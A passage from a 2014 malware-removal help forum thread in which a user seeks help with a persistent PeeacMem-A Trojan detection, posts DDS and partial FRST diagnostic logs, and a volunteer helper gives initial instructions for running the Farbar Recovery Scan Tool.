
Unable to remove PeeacMem-A Trojan and other symptoms


  • This topic is locked
14 replies to this topic

#1 sysadmin74

sysadmin74

  • Members
  • 21 posts

Posted 23 October 2014 - 09:49 PM

My computer has been exhibiting strange symptoms over the past several days.  Specifically, downloads are set to disabled under Security Settings for the Internet zone in Internet Explorer and the speaker is muted.  I didn't disable downloads or mute the speaker on my own and no one else who uses the PC did either.  At times, the computer has also generated dllhost.exe processes which take up a lot of system resources.  I ran a virus scan (I have McAfee Internet Security) and quarantined 3 items.  I've also run countless other utilities, including TDSSKiller, Malwarebytes Antimalware, Sophos Virus Removal Tool, Avast and various rootkit removal tools.  Sophos has detected the PeeacMem-A Trojan, but I've been unable to remove it so far.  It finds it and attempts to remove it, but after continuing the scan it is discovered again and removed.  I keep going in this loop.  The most recent Malwarebytes scan didn't reveal any issues.  I'm aware that I may have to re-format the hard drive and re-install the OS, but I was curious whether there are any suggestions anyone may know of that may fix it without a re-install.  Enclosed is the attach.txt file as well as the contents of the DDS.txt file immediately below.  Thank you in advance for any assistance provided for this issue.

 

Sincerely,

 

John

 

DDS (Ver_2012-11-20.01) - NTFS_x86
Internet Explorer: 11.0.9600.17344  BrowserJavaVersion: 10.71.2
Run by Jude at 21:04:57 on 2014-10-23
Microsoft Windows 7 Home Premium   6.1.7601.1.1252.1.1033.18.2814.873 [GMT -5:00]
.
AV: McAfee Anti-Virus and Anti-Spyware *Enabled/Updated* {ADA629C7-7F48-5689-624A-3B76997E0892}
AV: avast! Antivirus *Enabled/Updated* {17AD7D40-BA12-9C46-7131-94903A54AD8B}
SP: McAfee Anti-Virus and Anti-Spyware *Enabled/Updated* {16C7C823-5972-5907-58FA-0004E2F9422F}
SP: Windows Defender *Disabled/Outdated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
SP: avast! Antivirus *Enabled/Updated* {ACCC9CA4-9C28-93C8-4B81-AFE241D3E736}
FW: McAfee Firewall *Enabled* {959DA8E2-3527-57D1-4915-924367AD4FE9}
.
============== Running Processes ================
.
C:\windows\system32\wininit.exe
C:\windows\system32\lsm.exe
C:\windows\system32\atiesrxx.exe
C:\windows\system32\atieclxx.exe
C:\windows\System32\spoolsv.exe
C:\Program Files\Common Files\Adobe\ARM\1.0\armsvc.exe
C:\windows\system32\Dwm.exe
C:\windows\system32\taskhost.exe
C:\windows\Explorer.EXE
C:\Program Files\Microsoft Small Business\Business Contact Manager\BcmSqlStartupSvc.exe
C:\Program Files\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe
C:\Program Files\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe
C:\Program Files\DDNI\DIBS\DDNIService.exe
C:\Program Files\EPSON\EpsonCustomerParticipation\EPCP.exe
C:\Program Files\Citrix\GoToMyPC\g2svc.exe
C:\Program Files\Citrix\GoToMyPC\g2comm.exe
C:\Program Files\Malwarebytes Anti-Malware\mbamscheduler.exe
C:\Program Files\Citrix\GoToMyPC\g2pre.exe
C:\Program Files\Malwarebytes Anti-Malware\mbamservice.exe
C:\Program Files\Citrix\GoToMyPC\g2tray.exe
C:\Program Files\Lenovo\FanSpeedControl\LenovoFSC.exe
C:\windows\system32\mfevtps.exe
C:\Program Files\Microsoft\Search Enhancement Pack\SeaPort\SeaPort.exe
C:\Program Files\Malwarebytes Anti-Malware\mbam.exe
c:\Program Files\Microsoft SQL Server\90\Shared\sqlbrowser.exe
C:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe
C:\Program Files\Realtek\Audio\HDA\RtHDVCpl.exe
C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
C:\Program Files\Lenovo\HealthCare\HealthCare.exe
C:\Program Files\Lenovo\Power2Go\CLMLSvc.exe
C:\Program Files\DDNI\Lenovo Idea Notes\DDNIMSGUser.exe
C:\Program Files\Epson Software\Event Manager\EEventManager.exe
C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
C:\Program Files\Common Files\Java\Java Update\jusched.exe
C:\Windows\System32\spool\drivers\w32x86\3\E_FATIHQA.EXE
C:\Program Files\Skype\Phone\Skype.exe
C:\Program Files\Common Files\McAfee\Platform\mcuicnt.exe
C:\Program Files\McAfee\MSC\McAPExe.exe
C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSvcM.exe
C:\Program Files\Common Files\McAfee\AMCore\mcshield.exe
C:\Program Files\Common Files\McAfee\SystemCore\mfefire.exe
C:\Program Files\Common Files\Mcafee\Platform\McSvcHost\McSvHost.exe
C:\windows\system32\SearchIndexer.exe
C:\windows\system32\wbem\wmiprvse.exe
C:\windows\system32\wbem\wmiprvse.exe
C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\CCC.exe
C:\Program Files\DDNI\Lenovo Idea Notes\DDNIMSGService.exe
C:\Program Files\Windows Media Player\wmpnetwk.exe
C:\Program Files\Citrix\GoToMyPC\g2mainh.exe
C:\Program Files\Citrix\GoToMyPC\g2host.exe
C:\Program Files\Citrix\GoToMyPC\g2audioh.exe
C:\Program Files\Citrix\GoToMyPC\g2printh.exe
C:\Program Files\McAfee\VirusScan\mcods.exe
C:\Program Files\Common Files\McAfee\Platform\Core\mchost.exe
C:\windows\system32\dllhost.exe
C:\Program Files\AVAST Software\Avast\AvastSvc.exe
C:\Program Files\AVAST Software\Avast\ng\ngtool.exe
C:\windows\system32\conhost.exe
C:\Program Files\AVAST Software\Avast\ng\vbox\AvastVBoxSVC.exe
C:\Program Files\AVAST Software\Avast\avastUi.exe
C:\windows\system32\wbem\unsecapp.exe
C:\windows\system32\taskhost.exe
C:\Program Files\AVAST Software\Avast\ng\mftutil.exe
C:\windows\system32\vssvc.exe
C:\Program Files\Sophos\Sophos Virus Removal Tool\SVRTgui.exe
C:\Program Files\Sophos\Sophos Virus Removal Tool\SVRTservice.exe
C:\Program Files\Citrix\GoToMyPC\g2fileh.exe
C:\windows\system32\SearchProtocolHost.exe
C:\windows\system32\SearchFilterHost.exe
C:\windows\system32\conhost.exe
C:\windows\system32\taskhost.exe
C:\windows\system32\rundll32.exe
c:\windows\system32\svchost.exe -k dcomlaunch
c:\windows\system32\svchost.exe -k rpcss
c:\windows\system32\svchost.exe -k localservicenetworkrestricted
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted
c:\windows\system32\svchost.exe -k localservice
c:\windows\system32\svchost.exe -k netsvcs
c:\windows\system32\svchost.exe -k gpsvcgroup
c:\windows\system32\svchost.exe -k networkservice
c:\windows\system32\svchost.exe -k localservicenonetwork
c:\windows\system32\svchost.exe -k localserviceandnoimpersonation
c:\windows\system32\svchost.exe -k imgsvc
c:\windows\system32\svchost.exe -k networkservicenetworkrestricted
C:\windows\System32\svchost.exe -k swprv
.
============== Pseudo HJT Report ===============
.
uStart Page = hxxp://www.twcc.com/
mStart Page = about:blank
uURLSearchHooks: McAfee SiteAdvisor Toolbar: {0EBBBE48-BAD4-4B4C-8E5A-516ABECAE064} - c:\program files\mcafee\siteadvisor\McIEPlg.dll
BHO: Search Helper: {6EBF7485-159F-4bff-A14F-B9E3AAC4465B} - c:\program files\microsoft\search enhancement pack\search helper\SEPsearchhelperie.dll
BHO: Java™ Plug-In SSV Helper: {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - c:\program files\java\jre7\bin\ssv.dll
BHO: avast! Online Security: {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} - c:\program files\avast software\avast\aswWebRepIE.dll
BHO: {9030D464-4C02-4ABF-8ECC-5164760863C6} - <orphaned>
BHO: McAfee SiteAdvisor BHO: {B164E929-A1B6-4A06-B104-2CD0E90A88FF} - c:\program files\mcafee\siteadvisor\McIEPlg.dll
BHO: Office Document Cache Handler: {B4F3A835-0E21-4959-BA22-42B3008E02FF} - c:\program files\microsoft office\office14\URLREDIR.DLL
BHO: Java™ Plug-In 2 SSV Helper: {DBC80044-A445-435b-BC74-9C25C1C588A9} - c:\program files\java\jre7\bin\jp2ssv.dll
TB: McAfee SiteAdvisor Toolbar: {0EBBBE48-BAD4-4B4C-8E5A-516ABECAE064} - c:\program files\mcafee\siteadvisor\McIEPlg.dll
uRun: [EPSON Artisan 730 Series] c:\windows\system32\spool\drivers\w32x86\3\e_fatihqa.exe /fu "c:\users\jude\appdata\local\temp\E_SECED.tmp" /EF "HKCU"
uRun: [Skype] "c:\program files\skype\phone\Skype.exe" /minimized /regrun
mRun: [LenovoFSC] c:\program files\lenovo\fanspeedcontrol\LenovoFSC.exe
mRun: [StartCCC] "c:\program files\ati technologies\ati.ace\core-static\CLIStart.exe" MSRun
mRun: [RtHDVCpl] c:\program files\realtek\audio\hda\RtHDVCpl.exe -s
mRun: [Healthcare] c:\program files\lenovo\healthcare\HealthCare.exe /hide
mRun: [CLMLServer] "c:\program files\lenovo\power2go\CLMLSvc.exe"
mRun: [UpdateP2GoShortCut] "c:\program files\lenovo\power2go\muitransfer\muistartmenu.exe" "c:\program files\lenovo\power2go" updatewithcreateonce "software\cyberlink\power2go\6.0"
mRun: [IdeaNotesUser] c:\program files\ddni\lenovo idea notes\DDNIMSGUser.exe
mRun: [EEventManager] "c:\program files\epson software\event manager\EEventManager.exe"
mRun: [LTCM Client] c:\program files\ltcm client\ltcmClient.exe /startup
mRun: [mcui_exe] "c:\program files\mcafee.com\agent\mcagent.exe" /runkey
mRun: [mcpltui_exe] "c:\program files\mcafee.com\agent\mcagent.exe" /runkey
mRun: [Adobe ARM] "c:\program files\common files\adobe\arm\1.0\AdobeARM.exe"
mRun: [SunJavaUpdateSched] "c:\program files\common files\java\java update\jusched.exe"
mRun: [AvastUI.exe] "c:\program files\avast software\avast\AvastUI.exe" /nogui
dRunOnce: [WLStart] "c:\program files\windows live\installer\wlstart.exe" /nosearch /nohomepage
mPolicies-System: ConsentPromptBehaviorAdmin = dword:5
mPolicies-System: ConsentPromptBehaviorUser = dword:3
mPolicies-System: EnableUIADesktopToggle = dword:0
mPolicies-System: SoftwareSASGeneration = dword:1
IE: E&xport to Microsoft Excel - c:\progra~1\micros~2\office14\EXCEL.EXE/3000
IE: Se&nd to OneNote - c:\progra~1\micros~2\office14\ONBttnIE.dll/105
IE: {219C3416-8CB2-491a-A3C7-D9FCDDC9D600} - {5F7B1267-94A9-47F5-98DB-E99415F33AEC} - c:\program files\windows live\writer\WriterBrowserExtension.dll
IE: {2670000A-7350-4f3c-8081-5663EE0C6C49} - {48E73304-E1D6-4330-914C-F5F514E3486C} - c:\program files\microsoft office\office14\ONBttnIE.dll
IE: {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - {FFFDC614-B694-4AE6-AB38-5D6374584B52} - c:\program files\microsoft office\office14\ONBttnIELinkedNotes.dll
IE: {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - c:\program files\skype\toolbars\internet explorer\SkypeIEPlugin.dll
DPF: {F27237D7-93C8-44C2-AC6E-D6057B9A918F} - hxxps://vpn.harris.com/dana-cached/sc/JuniperSetupClient.cab
TCP: NameServer = 209.18.47.61 209.18.47.62
TCP: Interfaces\{31BDD7EA-8BF2-43DC-97A6-54B8B590C42B} : DHCPNameServer = 209.18.47.61 209.18.47.62
Filter: application/x-mfe-ipt - {3EF5086B-5478-4598-A054-786C45D75692} - c:\program files\mcafee\msc\McSnIePl.dll
Filter: text/xml - {807573E5-5146-11D5-A672-00B0D022E945} - c:\program files\common files\microsoft shared\office14\MSOXMLMF.DLL
Handler: dssrequest - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\program files\mcafee\siteadvisor\McIEPlg.dll
Handler: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\program files\mcafee\siteadvisor\McIEPlg.dll
Handler: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - c:\program files\skype\toolbars\internet explorer\SkypeIEPlugin.dll
Handler: wlpg - {E43EF6CD-A37A-4A9B-9E6F-83F89B8E6324} - c:\program files\windows live\photo gallery\AlbumDownloadProtocolHandler.dll
SSODL: WebCheck - <orphaned>
.
============= SERVICES / DRIVERS ===============
.
R0 aswVmm;avast! VM Monitor;c:\windows\system32\drivers\aswVmm.sys [2014-10-23 206248]
R0 mfehidk;McAfee Inc. mfehidk;c:\windows\system32\drivers\mfehidk.sys [2012-6-22 576048]
R0 mfewfpk;McAfee Inc. mfewfpk;c:\windows\system32\drivers\mfewfpk.sys [2012-6-22 217224]
R1 aswSnx;aswSnx;c:\windows\system32\drivers\aswSnx.sys [2014-10-23 787800]
R1 aswSP;aswSP;c:\windows\system32\drivers\aswSP.sys [2014-10-23 422760]
R1 SCT_SKMScan;SCT_SKMScan;c:\windows\system32\drivers\sct_skmscan.sys [2012-10-12 33096]
R2 AMD External Events Utility;AMD External Events Utility;c:\windows\system32\atiesrxx.exe [2009-8-19 176128]
R2 aswHwid;avast! HardwareID;c:\windows\system32\drivers\aswHwid.sys [2014-10-23 24184]
R2 aswMonFlt;aswMonFlt;c:\windows\system32\drivers\aswMonFlt.sys [2014-10-23 70384]
R2 aswStm;aswStm;c:\windows\system32\drivers\aswStm.sys [2014-10-23 91496]
R2 avast! Antivirus;avast! Antivirus;c:\program files\avast software\avast\AvastSvc.exe [2014-10-23 50344]
R2 c2cautoupdatesvc;Skype Click to Call Updater;c:\program files\skype\toolbars\autoupdate\SkypeC2CAutoUpdateSvc.exe [2014-7-14 1390176]
R2 c2cpnrsvc;Skype Click to Call PNR Service;c:\program files\skype\toolbars\pnrsvc\SkypeC2CPNRSvc.exe [2014-7-14 1767520]
R2 DDNIMSGService;DDNIMSGService;c:\program files\ddni\lenovo idea notes\DDNIMSGService.exe [2010-10-13 171872]
R2 DDNIService;DDNIService;c:\program files\ddni\dibs\DDNIService.exe [2010-10-13 163680]
R2 EpsonCustomerParticipation;EpsonCustomerParticipation;c:\program files\epson\epsoncustomerparticipation\EPCP.exe [2011-6-9 521600]
R2 HomeNetSvc;McAfee Home Network;c:\program files\common files\mcafee\platform\mcsvchost\McSvHost.exe [2013-11-27 281560]
R2 MBAMScheduler;MBAMScheduler;c:\program files\malwarebytes anti-malware\mbamscheduler.exe [2014-10-19 1871160]
R2 MBAMService;MBAMService;c:\program files\malwarebytes anti-malware\mbamservice.exe [2014-10-19 968504]
R2 McAPExe;McAfee AP Service;c:\program files\mcafee\msc\McAPExe.exe [2013-11-27 145568]
R2 McMPFSvc;McAfee Personal Firewall Service;c:\program files\common files\mcafee\platform\mcsvchost\McSvHost.exe [2013-11-27 281560]
R2 McNaiAnn;McAfee VirusScan Announcer;c:\program files\common files\mcafee\platform\mcsvchost\McSvHost.exe [2013-11-27 281560]
R2 mcpltsvc;McAfee Platform Services;c:\program files\common files\mcafee\platform\mcsvchost\McSvHost.exe [2013-11-27 281560]
R2 McProxy;McAfee Proxy Service;c:\program files\common files\mcafee\platform\mcsvchost\McSvHost.exe [2013-11-27 281560]
R2 mfecore;McAfee Anti-Malware Core;c:\program files\common files\mcafee\amcore\mcshield.exe [2013-11-27 655936]
R2 mfefire;McAfee Firewall Core Service;c:\program files\common files\mcafee\systemcore\mfefire.exe [2012-8-25 169800]
R2 mfevtp;McAfee Validation Trust Protection Service;c:\windows\system32\mfevtps.exe [2012-8-25 179600]
R2 monblanking;monblanking;c:\windows\system32\drivers\monblanking.sys [2014-7-5 29280]
R2 VBoxAswDrv;VBoxAsw Support Driver;c:\program files\avast software\avast\ng\vbox\VBoxAswDrv.sys [2014-10-23 218192]
R2 WinI2C-DDC;WinI2C-DDC Kernel Mode Driver;c:\windows\system32\drivers\ddcdrv.sys [2010-5-7 16200]
R3 AvastVBoxSvc;AvastVBox COM Service;c:\program files\avast software\avast\ng\vbox\AvastVBoxSVC.exe [2014-10-23 3192344]
R3 cfwids;McAfee Inc. cfwids;c:\windows\system32\drivers\cfwids.sys [2012-8-25 62832]
R3 MBAMProtector;MBAMProtector;c:\windows\system32\drivers\mbam.sys [2013-11-30 23256]
R3 MBAMSwissArmy;MBAMSwissArmy;c:\windows\system32\drivers\MBAMSwissArmy.sys [2014-10-19 114904]
R3 MBAMWebAccessControl;MBAMWebAccessControl;c:\windows\system32\drivers\mwac.sys [2014-10-19 51928]
R3 mfeavfk;McAfee Inc. mfeavfk;c:\windows\system32\drivers\mfeavfk.sys [2012-8-25 238176]
R3 mfefirek;McAfee Inc. mfefirek;c:\windows\system32\drivers\mfefirek.sys [2012-8-25 369248]
R3 mfencbdc;McAfee Inc. mfencbdc;c:\windows\system32\drivers\mfencbdc.sys [2014-7-24 349192]
R3 RSUSBSTOR;RtsUStor.Sys Realtek USB Card Reader;c:\windows\system32\drivers\RtsUStor.sys [2010-5-7 169472]
R3 RTL8167;Realtek 8167 NT Driver;c:\windows\system32\drivers\Rt86win7.sys [2010-5-7 167936]
R3 SophosVirusRemovalTool;Sophos Virus Removal Tool;c:\program files\sophos\sophos virus removal tool\SVRTservice.exe [2014-8-11 152872]
R3 SuperIO;Lenovo ASD HWM Driver;c:\windows\system32\drivers\spio.sys [2009-6-5 11720]
S0 aswRvrt;avast! Revert;c:\windows\system32\drivers\aswRvrt.sys [2014-10-23 49944]
S2 clr_optimization_v4.0.30319_32;Microsoft .NET Framework NGEN v4.0.30319_X86;c:\windows\microsoft.net\framework\v4.0.30319\mscorsvw.exe [2013-9-11 105144]
S2 SkypeUpdate;Skype Updater;c:\program files\skype\updater\Updater.exe [2014-4-3 315008]
S3 b57nd60x;Broadcom NetXtreme Gigabit Ethernet - NDIS 6.0;c:\windows\system32\drivers\b57nd60x.sys [2009-7-13 229888]
S3 HipShieldK;McAfee Inc. HipShieldK;c:\windows\system32\drivers\HipShieldK.sys [2014-4-26 147912]
S3 hitmanpro37;HitmanPro 3.7 Support Driver;c:\windows\system32\drivers\hitmanpro37.sys [2014-10-20 30976]
S3 IEEtwCollectorService;Internet Explorer ETW Collector Service;c:\windows\system32\ieetwcollector.exe [2014-10-16 108032]
S3 mfebopk;McAfee Inc. mfebopk;c:\windows\system32\drivers\mfebopk.sys [2012-8-25 67816]
S3 mfencrk;McAfee Inc. mfencrk;c:\windows\system32\drivers\mfencrk.sys [2014-7-24 81296]
S3 RdpVideoMiniport;Remote Desktop Video Miniport Driver;c:\windows\system32\drivers\rdpvideominiport.sys [2013-4-13 14848]
S3 ssmirrdr;ssmirrdr;c:\windows\system32\drivers\ssmirrdr.sys [2010-7-21 10112]
S3 TsUsbFlt;TsUsbFlt;c:\windows\system32\drivers\TsUsbFlt.sys [2014-3-22 49152]
S3 WatAdminSvc;Windows Activation Technologies Service;c:\windows\system32\wat\WatAdminSvc.exe [2010-8-14 1343400]
S3 wsvd;wsvd;c:\windows\system32\drivers\wsvd.sys [2009-7-21 81704]
S3 yukonw7;NDIS6.2 Miniport Driver for Marvell Yukon Ethernet Controller;c:\windows\system32\drivers\yk62x86.sys [2009-7-13 311296]
.
=============== Created Last 30 ================
.
2014-10-24 01:57:05 -------- d-----w- C:\AdwCleaner
2014-10-24 01:32:58 -------- d-----w- c:\users\jude\appdata\roaming\AVAST Software
2014-10-24 01:30:33 -------- d-----w- c:\windows\system32\vbox
2014-10-24 01:28:37 91496 ----a-w- c:\windows\system32\drivers\aswStm.sys
2014-10-24 01:28:36 49944 ----a-w- c:\windows\system32\drivers\aswRvrt.sys
2014-10-24 01:28:36 206248 ----a-w- c:\windows\system32\drivers\aswVmm.sys
2014-10-24 01:28:35 70384 ----a-w- c:\windows\system32\drivers\aswMonFlt.sys
2014-10-24 01:28:35 24184 ----a-w- c:\windows\system32\drivers\aswHwid.sys
2014-10-24 01:28:34 81768 ----a-w- c:\windows\system32\drivers\aswRdr2.sys
2014-10-24 01:28:33 787800 ----a-w- c:\windows\system32\drivers\aswSnx.sys
2014-10-24 01:28:23 43152 ----a-w- c:\windows\avastSS.scr
2014-10-24 01:27:01 -------- d-----w- c:\program files\AVAST Software
2014-10-24 01:25:59 -------- d-----w- c:\programdata\AVAST Software
2014-10-24 00:40:36 -------- d-----w- c:\programdata\Sophos
2014-10-24 00:39:58 73728 ----a-r- c:\users\jude\appdata\roaming\microsoft\installer\{b829e117-d072-41ea-9606-9826a38d34c1}\SVRTgui.exe1_810EDD9E2F0A4E2BACF86673C38D9F48.exe
2014-10-24 00:39:58 73728 ----a-r- c:\users\jude\appdata\roaming\microsoft\installer\{b829e117-d072-41ea-9606-9826a38d34c1}\SVRTgui.exe_810EDD9E2F0A4E2BACF86673C38D9F48.exe
2014-10-24 00:39:58 73728 ----a-r- c:\users\jude\appdata\roaming\microsoft\installer\{b829e117-d072-41ea-9606-9826a38d34c1}\ARPPRODUCTICON.exe
2014-10-24 00:39:54 -------- d-----w- c:\program files\Sophos
2014-10-23 17:36:09 -------- d-----w- c:\users\jude\appdata\local\CrashDumps
2014-10-23 04:37:18 -------- d-----w- c:\programdata\Oracle
2014-10-23 04:34:56 96680 ----a-w- c:\windows\system32\WindowsAccessBridge.dll
2014-10-21 03:13:51 -------- d-sh--w- C:\$RECYCLE.BIN
2014-10-21 02:34:34 -------- d-----w- c:\program files\ESET
2014-10-21 02:07:58 30976 ----a-w- c:\windows\system32\drivers\hitmanpro37.sys
2014-10-21 02:07:38 -------- d-----w- c:\programdata\HitmanPro
2014-10-21 01:22:20 34808 ----a-w- c:\windows\system32\drivers\TrueSight.sys
2014-10-21 01:22:15 -------- d-----w- c:\programdata\RogueKiller
2014-10-19 14:45:54 114904 ----a-w- c:\windows\system32\drivers\MBAMSwissArmy.sys
2014-10-19 14:34:08 75480 ----a-w- c:\windows\system32\drivers\mbamchameleon.sys
2014-10-19 14:34:06 51928 ----a-w- c:\windows\system32\drivers\mwac.sys
2014-10-19 14:34:02 -------- d-----w- c:\program files\Malwarebytes Anti-Malware
2014-10-16 11:01:08 156824 ----a-w- c:\windows\system32\mscorier.dll
2014-10-16 11:01:08 1131664 ----a-w- c:\windows\system32\dfshim.dll
2014-10-16 11:01:07 81560 ----a-w- c:\windows\system32\mscories.dll
2014-10-16 11:01:04 2379264 ----a-w- c:\windows\system32\win32k.sys
2014-10-16 10:59:47 2744320 ----a-w- c:\windows\system32\rdpcorets.dll
2014-10-16 10:59:32 65536 ----a-w- c:\windows\system32\TSpkg.dll
2014-10-16 10:59:32 523264 ----a-w- c:\windows\system32\termsrv.dll
2014-10-16 10:59:32 31232 ----a-w- c:\windows\system32\drivers\tssecsrv.sys
2014-10-16 10:59:32 304128 ----a-w- c:\windows\system32\winlogon.exe
2014-10-16 10:59:32 184320 ----a-w- c:\windows\system32\drivers\rdpwd.sys
2014-10-16 10:59:32 17408 ----a-w- c:\windows\system32\credssp.dll
2014-10-16 10:59:32 157696 ----a-w- c:\windows\system32\winsta.dll
2014-10-16 10:59:32 130048 ----a-w- c:\windows\system32\rdpcorekmts.dll
2014-10-16 10:59:08 67072 ----a-w- c:\windows\system32\packager.dll
2014-10-16 10:58:35 5702656 ----a-w- c:\windows\system32\mstscax.dll
2014-10-08 21:48:49 -------- d--h--w- c:\programdata\{D9E629DC-CB1C-4A97-9900-81922B4EFFD4}
.
==================== Find3M  ====================
.
2014-10-23 04:18:10 71344 ----a-w- c:\windows\system32\FlashPlayerCPLApp.cpl
2014-10-23 04:18:10 701104 ----a-w- c:\windows\system32\FlashPlayerApp.exe
2014-10-01 16:11:10 23256 ----a-w- c:\windows\system32\drivers\mbam.sys
2014-09-25 22:32:04 2017280 ----a-w- c:\windows\system32\inetcpl.cpl
2014-09-19 01:25:12 4201472 ----a-w- c:\windows\system32\jscript9.dll
2014-09-19 01:14:57 2724864 ----a-w- c:\windows\system32\mshtml.tlb
2014-09-19 01:14:44 4096 ----a-w- c:\windows\system32\ieetwcollectorres.dll
2014-09-19 01:02:07 454656 ----a-w- c:\windows\system32\vbscript.dll
2014-09-19 01:01:47 61952 ----a-w- c:\windows\system32\iesetup.dll
2014-09-19 01:01:03 51200 ----a-w- c:\windows\system32\ieetwproxystub.dll
2014-09-19 00:59:40 61952 ----a-w- c:\windows\system32\MshtmlDac.dll
2014-09-19 00:50:16 112128 ----a-w- c:\windows\system32\ieUnatt.exe
2014-09-19 00:50:15 108032 ----a-w- c:\windows\system32\ieetwcollector.exe
2014-09-19 00:49:31 597504 ----a-w- c:\windows\system32\jscript9diag.dll
2014-09-19 00:44:23 646144 ----a-w- c:\windows\system32\MsSpellCheckingFacility.exe
2014-09-19 00:36:23 60416 ----a-w- c:\windows\system32\JavaScriptCollectionAgent.dll
2014-09-19 00:18:55 1068032 ----a-w- c:\windows\system32\mshtmlmedia.dll
2014-09-18 23:59:11 1810944 ----a-w- c:\windows\system32\wininet.dll
2014-09-04 07:47:48 53080 ----a-w- c:\windows\system32\spool\prtprocs\w32x86\GoToPrintProcessor.dll
2014-09-04 07:47:46 126296 ----a-w- c:\windows\system32\gotomon.dll
2014-09-04 07:28:16 29280 ----a-w- c:\windows\system32\drivers\monblanking.sys
2014-09-04 05:04:15 372736 ----a-w- c:\windows\system32\rastls.dll
2014-08-23 01:46:55 305152 ----a-w- c:\windows\system32\gdi32.dll
.
============= FINISH: 21:07:10.27 ===============
 

Attached Files




#2 Gunto

Gunto

    Bleepin' Reject Phoenix


  • Malware Response Team
  • 1,291 posts
  • Gender:Female
  • Location:North Las Vegas, Nevada, USA

Posted 24 October 2014 - 12:58 AM

Hi, sysadmin74! I'm going to try to help you out. :)

Before we get started, here are some things I need you to remember:

  • Please don't make any changes to your computer without asking me first! This will make it practically impossible for me to assist you.
  • Please don't run things without asking me first, this will also make it impossible for me to help you.
  • If you're getting help elsewhere, or have already resolved the problem, please let me know so I can close this thread.
  • Please respond to me within five days of me replying to you. If you need more time, please let me know. I will close topics that I have not received a response from within five days.
  • Please be patient with me. I need some time to analyze your logs and responses so I can correctly help you. I should respond to you within two days, but if I haven't, please send me a PM! I may have missed your response. Bribing me with candy for faster replies is not advised.
  • If something goes wrong, you don't understand something, or you don't know what to do, please stop and ask me before proceeding with any further steps!

First, it looks like you're running more than one antivirus program (avast! and McAfee). Having more than one AV installed at the same time does more harm than good, often causing false alarms with malware notifications and system performance issues, such as slowing your system down drastically or even freezing from both programs trying to access the same file at the same time. To make things better and easier for the both of us, I need you to remove one of the programs. Please let me know which one you want to remove in your next post.

 

Farbar Recovery Scan Tool
 

Now then, let's run a scan with FRST to get some more information.

  • Download the version of FRST that is designed for your system from here, and save it to your desktop. If you don't know which one is designed for your system, download both and try running both. Only one will work correctly, and that's the one you need to use.
  • Double-click the program to run it. Accept the disclaimer and click the Scan button.
  • Once it's done scanning, FRST will create two logs on your desktop, FRST<time-program-was-run>.txt and Addition<time-program-was-run>.txt. Please copy and paste both into your reply, one at a time.

Gunto




#3 sysadmin74

sysadmin74
  • Topic Starter

  • Members
  • 21 posts

Posted 24 October 2014 - 07:50 PM

I'm still in the process of uninstalling all antivirus products save for McAfee.  I've pasted the results of the scan here; the FRST scan results are first.

 

Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version: 23-10-2014
Ran by Jude (administrator) on GERSTNER-PC on 24-10-2014 19:32:17
Running from C:\Users\Jude\Documents
Loaded Profile: Jude (Available profiles: Jude)
Platform: Microsoft Windows 7 Home Premium  Service Pack 1 (X86) OS Language: English (United States)
Internet Explorer Version 11
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Enigma Software Group USA, LLC.) C:\Program Files\Enigma Software Group\SpyHunter\SH4Service.exe
(AMD) C:\Windows\System32\atiesrxx.exe
(AMD) C:\Windows\System32\atieclxx.exe
(AVAST Software) C:\Program Files\AVAST Software\Avast\AvastSvc.exe
(Lenovo (Shenzhen) Electronic Co., Ltd.) C:\Program Files\Lenovo\FanSpeedControl\LenovoFSC.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtHDVCpl.exe
(Lenovo) C:\Program Files\Lenovo\HealthCare\HealthCare.exe
(CyberLink) C:\Program Files\Lenovo\Power2Go\CLMLSvc.exe
(Advanced Micro Devices Inc.) C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
(Digital Delivery Networks, Inc.) C:\Program Files\DDNI\Lenovo Idea Notes\DDNIMSGUser.exe
(SEIKO EPSON CORPORATION) C:\Program Files\Epson Software\Event Manager\EEventManager.exe
(Oracle Corporation) C:\Program Files\Common Files\Java\Java Update\jusched.exe
(AVAST Software) C:\Program Files\AVAST Software\Avast\AvastUI.exe
(Skype Technologies S.A.) C:\Program Files\Skype\Phone\Skype.exe
(McAfee, Inc.) C:\Program Files\Common Files\Mcafee\Platform\McUICnt.exe
(ATI Technologies Inc.) C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\CCC.exe
(Microsoft Corporation) C:\Program Files\Microsoft Small Business\Business Contact Manager\BcmSqlStartupSvc.exe
(Microsoft Corporation) C:\Program Files\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe
(Microsoft Corporation) C:\Program Files\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe
(Digital Delivery Networks, Inc.) C:\Program Files\DDNI\DIBS\DDNIService.exe
(Enigma Software Group USA, LLC.) C:\Program Files\Enigma Software Group\SpyHunter\SpyHunter4.exe
(SEIKO EPSON CORPORATION) C:\Program Files\epson\EpsonCustomerParticipation\EPCP.exe
(Citrix Online, a division of Citrix Systems, Inc.) C:\Program Files\Citrix\GoToMyPC\g2svc.exe
(Malwarebytes Corporation) C:\Program Files\Malwarebytes Anti-Malware\mbamscheduler.exe
(Citrix Online, a division of Citrix Systems, Inc.) C:\Program Files\Citrix\GoToMyPC\g2comm.exe
